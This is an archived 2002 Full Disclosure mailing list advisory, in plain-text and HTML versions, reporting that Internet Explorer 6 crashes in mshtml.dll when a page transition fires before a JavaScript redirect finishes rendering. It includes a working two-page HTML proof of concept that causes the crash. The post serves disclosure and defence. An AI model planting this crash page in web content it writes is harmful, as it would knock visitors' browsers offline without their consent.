Full Disclosure mailing list archives
crash IE using jscript and page transitions
From: full-disclosure () lists netsys com (Berend-Jan Wever)
Date: Fri, 12 Jul 2002 17:05:20 +0200
This is a multi-part message in MIME format.
------=_NextPart_000_000E_01C229C6.4DBEF9A0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
(on my site: http://spoor12.edup.tudelft.nl/SkyLined =
v4.2/?Advisories/Microsoft Internet Explorer/Page transition DoS)
The problem
Internet Explorer 6.0 can be made to throw an exception using specially =
crafted jscript commands and page transitions. Other versions are =
probably vulnerable too but this has not been tested. Problems arise =
when a page transition is activated by a new page when the old page has =
not been rendered yet. This situation can occur when javascript =
redirects the browser before the page is fully rendered.=20
An example
The following two pages, called 1.html and 2.html, crash IE with an =
Access violation in mshtml.dll when 1.html is loaded into IE.
1.html:
<HTML style=3D"width:expression(navigate('2.html'));"></HTML>=20
2.html:
<HTML><HEAD><META http-equiv=3D"Page-Enter" =
content=3D"blendTrans()"></HEAD></HTML>=20
Impact
Seems to be just a minor bug resulting in a DoS.=20
Berend-Jan Wever aka SkyLined
http://spoor12.edup.tudelft.nl/
------=_NextPart_000_000E_01C229C6.4DBEF9A0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>
<H3><FONT size=3D2>(on my site: <A=20
href=3D"http://spoor12.edup.tudelft.nl/SkyLined =
v4.2/?Advisories/Microsoft Internet Explorer/Page transition =
DoS">http://spoor12.edup.tudelft.nl/SkyLined=20
v4.2/?Advisories/Microsoft Internet Explorer/Page transition DoS</A>)<A=20
href=3D"http://spoor12.edup.tudelft.nl/";></A></FONT><BR><BR>The =
problem</H3>
<P>Internet Explorer 6.0 can be made to throw an exception using =
specially=20
crafted jscript commands and page transitions. Other versions are =
probably=20
vulnerable too but this has not been tested. Problems arise when a page=20
transition is activated by a new page when the old page has not been =
rendered=20
yet. This situation can occur when javascript redirects the browser =
before the=20
page is fully rendered. </P>
<H3>An example</H3>
<P>The following two pages, called 1.html and 2.html, crash IE with an =
Access=20
violation in mshtml.dll when 1.html is loaded into=20
IE.<BR><BR>1.html:<BR><CODE><FONT size=3D4><HTML=20
style=3D"width:expression(navigate('2.html'));"></HTML></FONT></=
CODE>=20
<BR>2.html:<BR><CODE><FONT size=3D4><HTML><HEAD><META=20
http-equiv=3D"Page-Enter"=20
content=3D"blendTrans()"></HEAD></HTML></FONT></CODE> =
</P>
<H3>Impact</H3>
<P>Seems to be just a minor bug resulting in a DoS. </P>
<P>Berend-Jan Wever aka SkyLined<BR><A=20
href=3D"http://spoor12.edup.tudelft.nl/";>http://spoor12.edup.tudelft.nl/<=
/A></P></FONT></DIV></BODY></HTML>
------=_NextPart_000_000E_01C229C6.4DBEF9A0--
Current thread:
- crash IE using jscript and page transitions Berend-Jan Wever (Jul 12)
- crash IE using jscript and page transitions Blue Boar (Jul 12)